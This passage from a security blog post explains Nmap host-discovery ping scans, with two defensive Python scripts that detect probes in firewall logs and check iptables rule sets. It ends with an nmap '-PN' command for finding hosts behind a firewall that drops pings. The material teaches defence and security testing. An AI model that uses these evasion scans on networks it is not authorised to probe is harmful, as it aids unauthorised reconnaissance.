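A defender can recognise these probes on the firewall itself. The following script is an added example, not code from the original post or from Nmap: it parses netfilter LOG lines (the key=value format the kernel writes when a LOG rule is placed in front of the DROP rules; the "FW-DROP" prefix, the function names and the log lines themselves are constructed for this example) and classifies each dropped packet as one of the discovery probes covered above: UDP to port 40125 (-PU), ICMP echo, TCP SYN to 443, TCP ACK to 80, and IP protocol 2 or 4 (-PO). Sources that send several different probe kinds are reported, since a single stray UDP packet can be legitimate but a mix of these probe types from one source is the signature of host discovery.

```python
"""Classify Nmap-style host-discovery probes in netfilter LOG output.

Added example for this article (not from the original post or from Nmap).
Assumes a rule such as `iptables -I INPUT -j LOG --log-prefix "FW-DROP "`
(hypothetical prefix) sits before the DROP rules, so every blocked probe
leaves a kernel line in the usual key=value format.
"""
import re
from collections import defaultdict

# Probe types used by the article's scans: UDP ping (-PU, default port 40125),
# ICMP echo ping, TCP SYN ping to 443, TCP ACK ping to 80 and IP protocol
# ping (-PO: protocols 1, 2 and 4; protocol 1 is ICMP and handled separately).
UDP_PING_PORT = 40125
SYN_PING_PORTS = {443}
ACK_PING_PORTS = {80}
PROTO_PING_NUMBERS = {"2", "4"}   # IGMP and IP-in-IP appear as numbers in LOG

KV_RE = re.compile(r"(\w+)=(\S*)")
TCP_FLAG_RE = re.compile(r"\b(SYN|ACK|FIN|RST|PSH|URG)\b")


def parse_log_line(line):
    """Return the key=value fields of a LOG line plus the set of TCP flag words."""
    fields = dict(KV_RE.findall(line))
    # TCP flags are logged as bare words (SYN, ACK, ...) after the RES= field.
    fields["FLAGS"] = set(TCP_FLAG_RE.findall(line))
    return fields


def classify_probe(fields):
    """Map one logged packet to the Nmap discovery probe it resembles, or None."""
    proto = fields.get("PROTO")
    if proto == "ICMP" and fields.get("TYPE") == "8":
        return "icmp-echo-ping"
    if proto == "UDP" and fields.get("DPT") == str(UDP_PING_PORT):
        return "udp-ping"
    if proto == "TCP":
        dpt = int(fields.get("DPT", 0))
        if fields["FLAGS"] == {"SYN"} and dpt in SYN_PING_PORTS:
            return "tcp-syn-ping"
        if fields["FLAGS"] == {"ACK"} and dpt in ACK_PING_PORTS:
            return "tcp-ack-ping"
    if proto in PROTO_PING_NUMBERS:
        return "ip-protocol-ping"
    return None


def detect_discovery(lines, min_kinds=2):
    """Group probes by source and report sources that mix several probe kinds."""
    seen = defaultdict(set)
    for line in lines:
        fields = parse_log_line(line)
        kind = classify_probe(fields)
        if kind and "SRC" in fields:
            seen[fields["SRC"]].add(kind)
    return {src: sorted(kinds) for src, kinds in seen.items() if len(kinds) >= min_kinds}


# Constructed sample LOG lines: one of each probe from 192.168.1.10 and a
# normal SSH connection attempt from 192.168.1.50.
_HDR = ("Jan  5 10:00:01 fw kernel: FW-DROP IN=eth0 OUT= "
        "MAC=00:0c:29:aa:bb:cc:00:0c:29:dd:ee:ff:08:00 ")
_IP10 = "SRC=192.168.1.10 DST=192.168.1.104 LEN=44 TOS=0x00 PREC=0x00 TTL=44 ID=1 "
_IP50 = "SRC=192.168.1.50 DST=192.168.1.104 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2 "
SAMPLE_LOG = [
    _HDR + _IP10 + "PROTO=UDP SPT=51234 DPT=40125 LEN=8",
    _HDR + _IP10 + "PROTO=ICMP TYPE=8 CODE=0 ID=4321 SEQ=1",
    _HDR + _IP10 + "PROTO=TCP SPT=44000 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0",
    _HDR + _IP10 + "PROTO=TCP SPT=44001 DPT=80 WINDOW=1024 RES=0x00 ACK URGP=0",
    _HDR + _IP10 + "PROTO=2 ",
    _HDR + _IP10 + "PROTO=4 ",
    _HDR + _IP50 + "PROTO=TCP SPT=55000 DPT=22 WINDOW=64240 RES=0x00 SYN URGP=0",
]

if __name__ == "__main__":
    for src, kinds in detect_discovery(SAMPLE_LOG).items():
        print(f"{src}: host-discovery probes seen: {', '.join(kinds)}")
```

Run against real logs by feeding the kernel lines (for example from journalctl -k) to detect_discovery; the threshold min_kinds is what separates a scanner cycling through probe types from a host that merely sent one odd packet.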

Block IP Protocol Ping Scan

Now let's add firewall rules in iptables to drop ICMP packets, TCP SYN packets on port 443 and TCP ACK packets on port 80 (which blocks the ping sweep scan), and also drop UDP packets and IP protocol packets, to protect the network from any kind of ping scan. A network admin might equally have blocked TCP packets entirely.

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 443 -j DROP

sudo iptables -I INPUT -p UDP -j DROP

sudo iptables -I INPUT -p IP -j DROP

As a result, Nmap's TCP ping, ICMP ping, UDP ping and protocol ping are all blocked, so it cannot identify whether the host is live.
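One caveat a practitioner should know about the last rule: iptables resolves -p IP through /etc/protocols, where "ip" is protocol number 0, and protocol 0 means "all protocols" to iptables. That rule therefore drops every inbound packet, not only the IP-in-IP probe, which is why all four ping types fail but also why any legitimate service on the host becomes unreachable. The script below is an added example (not from the article, Nmap or iptables) that parses the rule lines above, resolves the protocol the same way iptables does, models the INPUT chain with the ordering that -I produces (each insert goes to position 1, so the chain ends up in reverse command order), and reports which constructed sample packets each rule set drops. The function names, the packet set and the RULESET_NARROW variant that drops protocols 2 and 4 by number instead of everything are my own additions.

```python
"""Evaluate the article's iptables rule sets against sample probes.

Added example (not from the original post, Nmap or iptables). It resolves -p
the way iptables does (by name via /etc/protocols, where "ip" is 0 and 0 means
"all"), builds the INPUT chain as -I orders it, and applies first-match rules.
"""
import shlex
import socket

# Used only when /etc/protocols is unavailable (constructed subset).
_FALLBACK_PROTOCOLS = {"ip": 0, "icmp": 1, "igmp": 2, "ipip": 4, "tcp": 6, "udp": 17}
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def resolve_protocol(name):
    """Return the protocol number iptables would use for a -p argument."""
    name = name.lower()
    if name == "all":
        return 0
    if name.isdigit():
        return int(name)
    try:
        return socket.getprotobyname(name)   # reads /etc/protocols like iptables
    except OSError:
        return _FALLBACK_PROTOCOLS[name]


def _flagset(spec):
    """Expand a --tcp-flags list (ALL, NONE or comma-separated names) to a set."""
    spec = spec.upper()
    if spec == "ALL":
        return set(TCP_FLAGS)
    if spec == "NONE":
        return set()
    return set(spec.split(","))


def parse_rule(cmdline):
    """Parse the subset of iptables syntax used in the article into a rule dict."""
    args = shlex.split(cmdline)
    rule = {"proto": 0, "flags": None, "dport": None, "target": "ACCEPT"}
    i = 0
    while i < len(args):
        if args[i] == "-p":
            rule["proto"] = resolve_protocol(args[i + 1]); i += 2
        elif args[i] == "--tcp-flags":   # mask, then flags that must be set
            rule["flags"] = (_flagset(args[i + 1]), _flagset(args[i + 2])); i += 3
        elif args[i] == "--dport":
            rule["dport"] = int(args[i + 1]); i += 2
        elif args[i] == "-j":
            rule["target"] = args[i + 1]; i += 2
        else:
            i += 1
    return rule


def rule_matches(rule, pkt):
    """Match one rule against a packet dict; protocol 0 matches every packet."""
    if rule["proto"] != 0 and pkt["proto"] != rule["proto"]:
        return False
    if rule["dport"] is not None and pkt.get("dport") != rule["dport"]:
        return False
    if rule["flags"] is not None:
        mask, comp = rule["flags"]
        if (pkt.get("flags", set()) & mask) != comp:
            return False
    return True


def build_chain(cmdlines):
    """-I INPUT inserts at position 1, so later commands end up earlier in the chain."""
    chain = []
    for cmd in cmdlines:
        chain.insert(0, parse_rule(cmd))
    return chain


def verdict(chain, pkt, policy="ACCEPT"):
    """First matching rule decides; otherwise the chain policy applies."""
    for rule in chain:
        if rule_matches(rule, pkt):
            return rule["target"]
    return policy


# The article's two rule sets (long options written with double dashes).
RULESET_FIRST = [
    "iptables -I INPUT -p ICMP -j DROP",
    "iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP",
    "iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 443 -j DROP",
    "iptables -I INPUT -p udp -j DROP",
]
RULESET_SECOND = RULESET_FIRST + ["iptables -I INPUT -p IP -j DROP"]
# Narrower alternative (my addition): drop only the protocol-ping probes by number.
RULESET_NARROW = RULESET_FIRST + ["iptables -I INPUT -p 2 -j DROP",
                                  "iptables -I INPUT -p 4 -j DROP"]

# Constructed sample packets: the article's probes plus a normal SSH SYN.
PACKETS = {
    "icmp echo": {"proto": 1},
    "udp 40125": {"proto": 17, "dport": 40125},
    "tcp syn 443": {"proto": 6, "dport": 443, "flags": {"SYN"}},
    "tcp ack 80": {"proto": 6, "dport": 80, "flags": {"ACK"}},
    "igmp (proto 2)": {"proto": 2},
    "ip-in-ip (proto 4)": {"proto": 4},
    "ssh syn 22": {"proto": 6, "dport": 22, "flags": {"SYN"}},
}


def evaluate(cmdlines):
    """Return {packet name: verdict} for the chain built from cmdlines."""
    chain = build_chain(cmdlines)
    return {name: verdict(chain, pkt) for name, pkt in PACKETS.items()}


if __name__ == "__main__":
    for label, rules in (("first", RULESET_FIRST), ("second", RULESET_SECOND),
                         ("narrow", RULESET_NARROW)):
        print(label, evaluate(rules))
```

With the first rule set the SSH SYN and the protocol-2/4 probes still pass; with the second every packet, SSH included, is dropped; with the narrow variant the two protocol-ping probes are dropped while SSH still gets through. Running the real iptables -S afterwards confirms the reversed order in which -I left the rules.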

Now repeat the protocol ping to identify the host state. From the image below you can observe that this time it reports 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Bypass IP protocol Ping using No Ping Scan

When all the ping scans above fail to identify whether the host is up or down, we choose the last and best option, "No Ping": we use -PN/-P0/-Pn, which skips host discovery and simply performs a TCP port scan of the top 1000 ports.

If you want to avoid both the port scan and the ping probes, combine the ping sweep (-sP) with no ping (-PN) as given below to identify whether the host is up or down.

nmap -sP -PN 192.168.1.104 --disable-arp-ping

From the image given below you can observe that it found 1 host up.

Author: Deepanshu is a Certified Ethical Hacker and a budding security researcher.

The post Understanding Guide for Nmap Ping Scan (Firewall Bypass) appeared first on Hacking Articles.
